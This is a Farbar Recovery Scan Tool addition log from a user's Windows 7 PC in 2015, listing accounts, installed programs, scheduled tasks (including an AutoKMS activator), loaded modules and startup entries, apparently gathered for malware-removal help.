C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2015-08-12 00:38

==================== End of log ============================
Additional scan result of Farbar Recovery Scan Tool (x64) Version:11-08-2015 02
Ran by Gianluca (2015-08-12 20:01:53)
Running from D:\Download
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-1973368479-3414220156-1287075655-500 - Administrator - Disabled)
Gianluca (S-1-5-21-1973368479-3414220156-1287075655-1000 - Administrator - Enabled) => C:\Users\Gianluca
Guest (S-1-5-21-1973368479-3414220156-1287075655-501 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Avira Antivirus (Disabled - Up to date) {4D041356-F94D-285F-8768-AAE50FA36859}
AS: Avira Antivirus (Disabled - Up to date) {F665F2B2-DF77-27D1-BDD8-9197742422E4}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

µTorrent (HKU\S-1-5-21-1973368479-3414220156-1287075655-1000\...\uTorrent) (Version: 3.3.2.30303 - BitTorrent Inc.)
Adobe Flash Player 16 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 16.0.0.305 - Adobe Systems Incorporated)
Adobe Flash Player 18 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 18.0.0.209 - Adobe Systems Incorporated)
AdVenture Capitalist (HKLM-x32\...\Steam App 346900) (Version: - Hyper Hippo Games)
AMD Catalyst Install Manager (HKLM\...\{F37C2975-92EA-59CA-59E6-50E56F0E76DD}) (Version: 8.0.916.0 - Advanced Micro Devices, Inc.)
Apple Mobile Device Support (HKLM\...\{439760BC-7737-4386-9B1D-A90A3E8A22EA}) (Version: 3.4.1.2 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
ATI AVIVO64 Codecs (Version: 11.6.0.50825 - ATI Technologies Inc.) Hidden
Avira (HKLM-x32\...\{a5e00a72-db4a-4f77-8874-d1265b8fcd7e}) (Version: 1.1.42.10415 - Avira Operations GmbH & Co. KG)
Avira (x32 Version: 1.1.42.10415 - Avira Operations GmbH & Co. KG) Hidden
Avira Antivirus (HKLM-x32\...\Avira Antivirus) (Version: 15.0.11.579 - Avira Operations GmbH & Co. KG)
BioShock (HKLM-x32\...\{E280923D-C5D9-4728-8C79-AC9A0DC75875}) (Version: 2.5.0000 - 2K Games)
Bluetooth Win7 Suite (64) (HKLM\...\{230D1595-57DA-4933-8C4E-375797EBB7E1}) (Version: 7.2.0.40 - Atheros Communications)
Bonjour (HKLM\...\{CA0D2F09-F811-48D4-843E-C87696C6A9D9}) (Version: 3.0.0.2 - Apple Inc.)
CameraHelperMsi (x32 Version: 13.31.1038.0 - Logitech) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 3.15 - Piriform)
CDBurnerXP (HKLM-x32\...\{7E265513-8CDA-4631-B696-F40D983F3B07}_is1) (Version: 4.5.4.5000 - CDBurnerXP)
CPUID HWMonitor Pro 1.10.1 (HKLM\...\CPUID HWMonitorPro_is1) (Version: - )
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Deluge 1.3.11 (HKLM-x32\...\Deluge) (Version: - )
Driver Pinnacle Video (HKLM\...\{6DE721A5-5E89-4D74-994C-652BB3C0672E}) (Version: 12.1.0.030 - Pinnacle Systems)
Edirol HQ Orchestral VSTi v1.03 (HKLM-x32\...\Edirol HQ Orchestral VSTi v1.03) (Version: - )
erLT (x32 Version: 1.20.138.34 - Logitech, Inc.) Hidden
EZdrummer (HKLM-x32\...\{43E8D9E7-AFC9-4BA3-8106-B95E02B87AB7}) (Version: 1.1.6 - Toontrack)
EZXCocktail (HKLM-x32\...\{147567F0-8575-4BE0-B5B3-62706C67FA5A}) (Version: 1.0 - Toontrack)
EZXDfh (HKLM-x32\...\{DB1299AF-9EE0-422B-959E-F4171B2AE0F7}) (Version: 1.0 - Toontrack)
EZXFunkmasters (HKLM-x32\...\{BB5A44CB-3045-43E2-BEB0-B64E477D4633}) (Version: 1.0.0 - Toontrack)
EZXJazz (HKLM-x32\...\{EED8D44F-CEBB-4298-8D0E-E01AF6AC0663}) (Version: 1.0.0 - Toontrack)
EZXPercussion (HKLM-x32\...\{2CC4BC82-41CF-43D3-B533-7283AA8BB86F}) (Version: 1.0 - Toontrack)
Facebook Video Calling 3.1.0.521 (HKLM-x32\...\{2091F234-EB58-4B80-8C96-8EB78C808CF7}) (Version: 3.1.521 - Skype Limited)
Foxit Reader 5.0 (HKLM-x32\...\Foxit Reader_is1) (Version: 5.0.2.718 - Foxit Corporation)
Fraps (remove only) (HKLM-x32\...\Fraps) (Version: - )
Game Booster (HKLM-x32\...\Game Booster_is1) (Version: 2.3.0.0 - IObit)
GlaceVerb 1.01 (HKLM-x32\...\GlaceVerb_is1) (Version: - Dasample)
Google Chrome (HKU\S-1-5-21-1973368479-3414220156-1287075655-1000\...\Google Chrome) (Version: 44.0.2403.130 - Google Inc.)
Grand Theft Auto IV (x32 Version: 1.0.0013.131 - Rockstar Games Inc.) Hidden
Grand Theft Auto: Episodes from Liberty City (x32 Version: 1.0.0002.135 - Rockstar Games Inc.) Hidden
Grand Theft Auto: Episodes from Liberty City (x32 Version: 1.0.0003.135 - Rockstar Games Inc.) Hidden
Guitar Pro 5.2 (HKLM-x32\...\Guitar Pro 5_is1) (Version: - Arobas Music)
Happy Wars (HKLM-x32\...\Steam App 246280) (Version: - Toylogic inc.)
HP LaserJet Professional P1100-P1560-P1600 Series (HKLM\...\HP LaserJet Professional P1100-P1560-P1600 Series) (Version: - )
install (Version: 1.2.0000 - Adobe Systems Incorporated) Hidden
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.0.2.1410 - Intel Corporation)
Intel® Network Connections Drivers (HKLM\...\PROSet) (Version: 15.4 - Intel)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 10.1.0.1008 - Intel Corporation)
Intel® Watchdog Timer Driver (Intel® WDT) (HKLM-x32\...\{3FD0C489-0F02-481a-A3E1-9754CD396761}) (Version: - Intel Corporation)
iTunes (HKLM\...\{B613A9BB-2B34-4824-A4BE-2427653D59D6}) (Version: 10.4.0.80 - Apple Inc.)
Java 8 Update 45 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218045F0}) (Version: 8.0.450 - Oracle Corporation)
JMicron JMB36X Driver (HKLM-x32\...\{3A1B5D40-41E9-43FA-8C7B-A8667F5586EF}) (Version: 1.17.58.2 - JMicron Technology Corp.)
Kazrog LLC Recabinet 3 VST RTAS v3.0.4 (HKLM-x32\...\Kazrog LLC Recabinet 3 VST RTAS v3.0.4_is1) (Version: - )
K-Lite Mega Codec Pack 9.7.0 (HKLM-x32\...\KLiteCodecPack_is1) (Version: 9.7.0 - )
L.A. Noire (HKLM-x32\...\{915726DF-7891-444A-AA03-0DF1D64F561A}) (Version: 1.00.0000 - Rockstar Games)
L.A. Noire Update v1.3.2613 (HKLM-x32\...\L.A Noire_is1) (Version: - )
LWS VideoEffects (Version: 13.30.1379.0 - Logitech) Hidden
Malwarebytes Anti-Malware version 2.0.4.1028 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.4.1028 - Malwarebytes Corporation)
marvell 91xx console driver (HKLM-x32\...\MagniDriver) (Version: 1.0.0.1045 - Marvell)
MATLAB R2010a (HKLM\...\MatlabR2010a) (Version: 7.10 - The MathWorks, Inc.)
Microsoft .NET Framework 4 Client Profile - Language Pack (ITA) (HKLM\...\Microsoft .NET Framework 4 Client Profile ITA Language Pack) (Version: 4.0.30320 - Microsoft Corporation)
Microsoft .NET Framework 4.5 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50709 - Microsoft Corporation)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{F2508213-9989-4E85-A078-72BE483917EF}) (Version: 3.5.88.0 - Microsoft Corporation)
Microsoft Games for Windows Marketplace (HKLM-x32\...\{4CB0307C-565E-4441-86BE-0DF2E4FB828C}) (Version: 3.5.50.0 - Microsoft Corporation)
Microsoft Office 2010 Service Pack 1 (SP1) (HKLM-x32\...\{90140000-003D-0000-0000-0000000FF1CE}_Office14.SingleImage_{047B0968-E622-4FAA-9B4B-121FA109EDDE}) (Version: - Microsoft)
Microsoft Office Professional 2010 (HKLM-x32\...\Office14.SingleImage) (Version: 14.0.6029.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.20913.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x64 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x86 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.51106 (HKLM-x32\...\{6e8f74e0-43bd-4dce-8477-6ff6828acc07}) (Version: 11.0.51106.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
MiPony 2.2.1 (HKLM-x32\...\MiPony) (Version: 2.2.1 - )
MotioninJoy Gamepad tool 0.7.1001 (HKLM\...\{330DAC67-5B62-452A-A0E4-6B4A5923940F}_is1) (Version: 0.7.1001 - www.motioninjoy.com)
Mozilla Firefox 39.0.3 (x86 it) (HKLM-x32\...\Mozilla Firefox 39.0.3 (x86 it)) (Version: 39.0.3 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 29.0.1 - Mozilla)
Native Instruments Guitar Rig 3 (HKLM-x32\...\Native Instruments Guitar Rig 3) (Version: - )
Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.0 - )
PCSX2 - Playstation 2 Emulator (HKLM-x32\...\pcsx2-r5875) (Version: - )
Pinnacle Studio 15 (HKLM-x32\...\{1362E602-9625-42D3-B57F-CDA9D26F9DA8}) (Version: 15.0.0.7593 - Pinnacle Systems)
PowerISO (HKLM-x32\...\PowerISO) (Version: 4.8 - PowerISO Computing, Inc.)
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.993 - Even Balance, Inc.)
QuickTime (HKLM-x32\...\{AF0CE7C0-A3E4-4D73-988B-B29187EC6E9A}) (Version: 7.73.80.64 - Apple Inc.)
Raccolta foto di Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Raptr (HKLM-x32\...\Raptr) (Version: - )
Realtek Ethernet Controller Driver For Windows 7 (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.21.531.2010 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6235 - Realtek Semiconductor Corp.)
REAPER (x64) (HKLM\...\REAPER) (Version: - )
Renesas Electronics USB 3.0 Host Controller Driver (HKLM-x32\...\InstallShield_{5442DAB8-7177-49E1-8B22-09A049EA5996}) (Version: 2.0.26.0 - Renesas Electronics Corporation)
Renesas Electronics USB 3.0 Host Controller Driver (x32 Version: 2.0.26.0 - Renesas Electronics Corporation) Hidden
Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 1.0.0.0 - Rockstar Games)
Sam Shutdown Timer (HKLM-x32\...\{A251CCAC-CCFF-4C1D-8C70-796BECC46682}) (Version: 1.0.0 - SameerSite.com)
SAMSUNG USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.27.0 - SAMSUNG Electronics Co., Ltd.)
Setup - Resident Evil HD Remaster © Capcom ... (HKLM-x32\...\Setup - Resident Evil HD Remaster © Capcom ...) (Version: ... - Capcom)
SFPack (HKLM-x32\...\Megota Software SFPack Uninstall) (Version: - )
Skype™ 7.6 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.6.105 - Skype Technologies S.A.)
Software della webcam Logitech (HKLM-x32\...\{D40EB009-0499-459c-A8AF-C9C110766215}) (Version: 2.0 - Logitech Inc.)
Steam (HKLM-x32\...\Steam) (Version: - Valve Corporation)
Stronghold Kingdoms (HKLM-x32\...\Steam App 47410) (Version: - FireFly Studios)
Superior Drummer 64 bit (HKLM\...\{22029AEE-38DF-4E35-AEF4-FE8CA3F6667F}) (Version: 2.2.3 - Toontrack)
Superior Drummer Installer (HKLM-x32\...\{009AC76E-1A66-4682-82B7-417E77F3C648}) (Version: 2.0.1 - Toontrack)
Supporto applicazioni Apple (HKLM-x32\...\{46F044A5-CE8B-4196-984E-5BD6525E361D}) (Version: 2.3.6 - Apple Inc.)
System Requirements Lab CYRI (HKLM-x32\...\{1F77C418-2C90-459C-BD33-B56A4182B9FA}) (Version: 4.4.26.0 - Husdawg, LLC)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.14 - TeamSpeak Systems GmbH)
TeamViewer 9 (HKLM-x32\...\TeamViewer 9) (Version: 9.0.32494 - TeamViewer)
ThermaCAM Researcher Pro 2.8 SR-3 (HKLM-x32\...\{A4883278-90CD-4D7E-BE63-602397384853}) (Version: - )
Toontrack solo (HKLM-x32\...\{5866520C-8857-4986-833A-039F4584C3F7}) (Version: 1.1.1 - Toontrack)
T-RackS 3 Deluxe (HKLM-x32\...\{423C4130-EBC3-410A-B3A0-37BBF9D607D5}) (Version: 3.1.1 - IK Multimedia)
TuxGuitar 1.2 (HKLM-x32\...\TuxGuitar_0) (Version: - )
VLC media player 1.1.10 (HKLM-x32\...\VLC media player) (Version: 1.1.10 - VideoLAN)
Waves Complete V9r13 (HKLM-x32\...\{91000001-C561-4E32-99EB-3C5AD3683A70}) (Version: 9.1.13 - Waves)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)
WinRAR gestione archivi (HKLM-x32\...\WinRAR archiver) (Version: - )

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-1973368479-3414220156-1287075655-1000_Classes\CLSID\{1423F872-3F7F-4E57-B621-8B1A9D49B448}\InprocServer32 -> C:\Users\Gianluca\AppData\Local\Google\Update\1.3.27.5\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-1973368479-3414220156-1287075655-1000_Classes\CLSID\{5C8C2A98-6133-4EBA-BBCC-34D9EA01FC2E}\InprocServer32 -> C:\Users\Gianluca\AppData\Local\Google\Update\1.3.28.1\psuser_64.dll (Google Inc.)
CustomCLSID: HKU\S-1-5-21-1973368479-3414220156-1287075655-1000_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\Gianluca\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll No File
CustomCLSID: HKU\S-1-5-21-1973368479-3414220156-1287075655-1000_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Gianluca\AppData\Local\Google\Update\1.3.28.1\psuser_64.dll (Google Inc.)

==================== Restore Points =========================

06-07-2015 20:29:34 Punto di controllo pianificato
13-07-2015 21:02:12 Punto di controllo pianificato
21-07-2015 13:35:16 Punto di controllo pianificato
09-08-2015 17:16:12 Punto di controllo pianificato
11-08-2015 00:48:54 Installed QuickTime 7

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-14 04:34 - 2015-05-07 12:01 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1 localhost

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {194464DB-C9B5-4BC4-94D8-876FD9FC46D8} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe
Task: {6210C999-490B-4CB2-B22F-2456CE4E049D} - System32\Tasks\{168C729A-6C4E-46D3-BF71-18F8B46C3C33} => pcalua.exe -a "C:\Program Files (x86)\R.G. Mechanics\Fallout 3\Data\_CNV_Fallout-3_TESTO__TBH_.exe" -d "C:\Program Files (x86)\R.G. Mechanics\Fallout 3\Data"
Task: {AB21A897-0FDA-403C-A0C6-1A85CA0BA989} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-1973368479-3414220156-1287075655-1000UA => C:\Users\Gianluca\AppData\Local\Facebook\Update\FacebookUpdate.exe [2012-07-13] (Facebook Inc.)
Task: {AFA4D7F7-7182-4EC2-A928-2D864BB159C8} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-1973368479-3414220156-1287075655-1000Core => C:\Users\Gianluca\AppData\Local\Facebook\Update\FacebookUpdate.exe [2012-07-13] (Facebook Inc.)
Task: {B0A718D8-55D7-49AB-9C18-C0C6DEE27872} - System32\Tasks\{3C525D42-E870-4868-A529-62358657886A} => D:\Desktop\Università\Borsista 2015\Gianluca\OTACS\OTACS.exe [2013-08-13] ()
Task: {CA3DCFBC-7722-4E58-A431-9010EC5EC440} - System32\Tasks\{B0BB2048-C7DA-4AC9-A1AF-979FC963DBC8} => D:\Documenti\Roba TomTom\modifica tomtom\patchYDG Dos\patchYDG Dos\patchYDG.exe [2009-03-26] ()
Task: {DECD53F3-6979-45CD-841F-D4B47A1F0BE1} - System32\Tasks\{4F03802F-5B4F-465C-B291-27496FC999FA} => pcalua.exe -a "G:\P8P67 drv aggiornati\Intel_Chipset_V9301019_XPVistaWin7\Intel_Chipset_V9301019_XPVistaWin7\netfx\dotnetfx35\dotnetfx35.exe" -d "G:\P8P67 drv aggiornati\Intel_Chipset_V9301019_XPVistaWin7\Intel_Chipset_V9301019_XPVistaWin7\netfx\dotnetfx35"
Task: {E5A4F826-874E-4F88-9CB5-BB20D53BAEFE} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1973368479-3414220156-1287075655-1000UA => C:\Users\Gianluca\AppData\Local\Google\Update\GoogleUpdate.exe [2014-10-24] (Google Inc.)
Task: {FE4A0195-B127-44D0-A31A-A100DDCAB283} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1973368479-3414220156-1287075655-1000Core => C:\Users\Gianluca\AppData\Local\Google\Update\GoogleUpdate.exe [2014-10-24] (Google Inc.)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\AutoKMS.job => C:\Windows\AutoKMS\AutoKMS.exe
Task: C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1973368479-3414220156-1287075655-1000Core.job => C:\Users\Gianluca\AppData\Local\Facebook\Update\FacebookUpdate.exe
Task: C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1973368479-3414220156-1287075655-1000UA.job => C:\Users\Gianluca\AppData\Local\Facebook\Update\FacebookUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1973368479-3414220156-1287075655-1000Core.job => C:\Users\Gianluca\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1973368479-3414220156-1287075655-1000UA.job => C:\Users\Gianluca\AppData\Local\Google\Update\GoogleUpdate.exe

==================== Loaded Modules (Whitelisted) ==============

2015-04-22 10:51 - 2012-08-31 15:03 - 00288768 _____ () C:\Windows\System32\HP1100LM.DLL
2015-04-22 10:51 - 2012-08-31 15:02 - 00074240 _____ () C:\Windows\system32\spool\PRTPROCS\x64\HP1100PP.DLL
2010-11-03 11:30 - 2010-11-03 11:30 - 00918144 ____R () C:\Program Files (x86)\ASUS\AXSP\1.00.13\atkexComSvc.exe
2010-12-02 04:15 - 2010-12-02 04:15 - 00915584 ____R () C:\Program Files (x86)\ASUS\AAHM\1.00.13\aaHMSvc.exe
2011-07-22 19:00 - 2010-10-21 11:52 - 00586880 ____R () C:\Program Files (x86)\ASUS\AsSysCtrlService\1.00.11\AsSysCtrlService.exe
2011-07-10 22:04 - 2014-11-05 19:39 - 00076152 _____ () C:\Windows\SysWOW64\PnkBstrA.exe
2011-07-22 19:00 - 2015-08-12 13:15 - 00023040 _____ () C:\Program Files (x86)\ASUS\AXSP\1.00.13\PEbiosinterface32.dll
2011-07-22 19:00 - 2010-06-29 04:58 - 00104448 ____R () C:\Program Files (x86)\ASUS\AXSP\1.00.13\ATKEX.dll
2011-07-09 13:56 - 2010-11-05 23:50 - 00058880 _____ () C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IsdiInterop.dll
2012-10-11 22:56 - 2012-10-11 22:56 - 00087952 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2012-10-11 22:56 - 2012-10-11 22:56 - 01242512 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2015-08-08 23:53 - 2015-07-31 08:19 - 01405768 _____ () C:\Users\Gianluca\AppData\Local\Google\Chrome\Application\44.0.2403.130\libglesv2.dll
2015-08-08 23:53 - 2015-07-31 08:19 - 00081224 _____ () C:\Users\Gianluca\AppData\Local\Google\Chrome\Application\44.0.2403.130\libegl.dll
2011-08-06 18:32 - 2006-07-04 09:25 - 00077824 _____ () C:\Program Files (x86)\Guitar Pro 5\rse\dll\G01.dll
2011-08-06 18:32 - 2006-06-30 09:18 - 02203648 _____ () C:\Program Files (x86)\Guitar Pro 5\rse\dll\O03.dll
2011-08-06 18:32 - 2006-05-30 07:03 - 00004608 _____ () C:\Program Files (x86)\Guitar Pro 5\rse\dll\F03.dll
2014-01-19 16:12 - 2015-04-16 19:40 - 00776192 _____ () C:\Program Files (x86)\Steam\SDL2.dll
2015-03-06 19:22 - 2015-04-23 04:16 - 04962816 _____ () C:\Program Files (x86)\Steam\v8.dll
2015-03-06 19:22 - 2015-04-23 04:16 - 01556992 _____ () C:\Program Files (x86)\Steam\icui18n.dll
2015-03-06 19:22 - 2015-04-23 04:16 - 01187840 _____ () C:\Program Files (x86)\Steam\icuuc.dll
2014-05-22 07:11 - 2015-06-04 20:56 - 02407104 _____ () C:\Program Files (x86)\Steam\video.dll
2014-10-15 17:57 - 2014-12-01 23:31 - 02396672 _____ () C:\Program Files (x86)\Steam\libavcodec-56.dll
2014-10-15 17:57 - 2014-12-01 23:31 - 00442880 _____ () C:\Program Files (x86)\Steam\libavutil-54.dll
2014-10-15 17:57 - 2014-12-01 23:31 - 00479744 _____ () C:\Program Files (x86)\Steam\libavformat-56.dll
2014-10-15 17:57 - 2014-12-01 23:31 - 00332800 _____ () C:\Program Files (x86)\Steam\libavresample-2.dll
2014-10-15 17:57 - 2014-12-01 23:31 - 00485888 _____ () C:\Program Files (x86)\Steam\libswscale-3.dll
2014-01-19 16:12 - 2015-06-04 20:56 - 00703168 _____ () C:\Program Files (x86)\Steam\bin\chromehtml.DLL
2014-01-19 16:12 - 2015-05-11 21:01 - 36302728 _____ () C:\Program Files (x86)\Steam\bin\libcef.dll
2015-05-16 18:10 - 2015-05-11 21:01 - 08958344 _____ () C:\Program Files (x86)\Steam\bin\pdf.dll
2015-08-08 23:53 - 2015-07-31 08:19 - 16308040 _____ () C:\Users\Gianluca\AppData\Local\Google\Chrome\Application\44.0.2403.130\PepperFlash\pepflashplayer.dll

==================== Alternate Data Streams (Whitelisted) =========

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1973368479-3414220156-1287075655-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Gianluca\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 62.94.0.41 - 62.94.0.42
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Monitor Apache Servers.lnk => C:\Windows\pss\Monitor Apache Servers.lnk.CommonStartup
MSCONFIG\startupreg: AdobeAAMUpdater-1.0 => "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
MSCONFIG\startupreg: AdobeCS5ServiceManager => "C:\Program Files (x86)\Common Files\Adobe\CS5ServiceManager\CS5ServiceManager.exe" -launchedbylogin
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: ASUS ShellProcess Execute => C:\Program Files (x86)\ASUS\AI Suite II\ASUS Mobilink\Simulator\AsShellProcess.exe
MSCONFIG\startupreg: AthBtTray => "C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe"
MSCONFIG\startupreg: AtherosBtStack => "C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe"
MSCONFIG\startupreg: Avira Systray => C:\Program Files (x86)\Avira\My Avira\Avira.OE.Systray.exe
MSCONFIG\startupreg: Facebook Update => "C:\Users\Gianluca\AppData\Local\Facebook\Update\FacebookUpdate.exe" /c /nocrashserver
MSCONFIG\startupreg: IAStorIcon => C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: JMB36X IDE Setup => C:\Windows\RaidTool\xInsIDE.exe
MSCONFIG\startupreg: KiesPreload => C:\Program Files (x86)\Samsung\Kies\Kies.exe /preload
MSCONFIG\startupreg: KiesTrayAgent => C:\Program Files (x86)\Samsung\Kies\KiesTrayAgent.exe
MSCONFIG\startupreg: LWS => C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe -hide
MSCONFIG\startupreg: msnmsgr => "C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe" /background
MSCONFIG\startupreg: NUSB3MON => "C:\Program Files (x86)\Renesas Electronics\USB 3.0 Host Controller Driver\Application\nusb3mon.exe"
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
MSCONFIG\startupreg: Raptr => C:\PROGRA~2\Raptr\raptrstub.exe --startup
MSCONFIG\startupreg: RGSC => C:\Program Files (x86)\Rockstar Games\Rockstar Games Social Club\RGSCLauncher.exe /silent
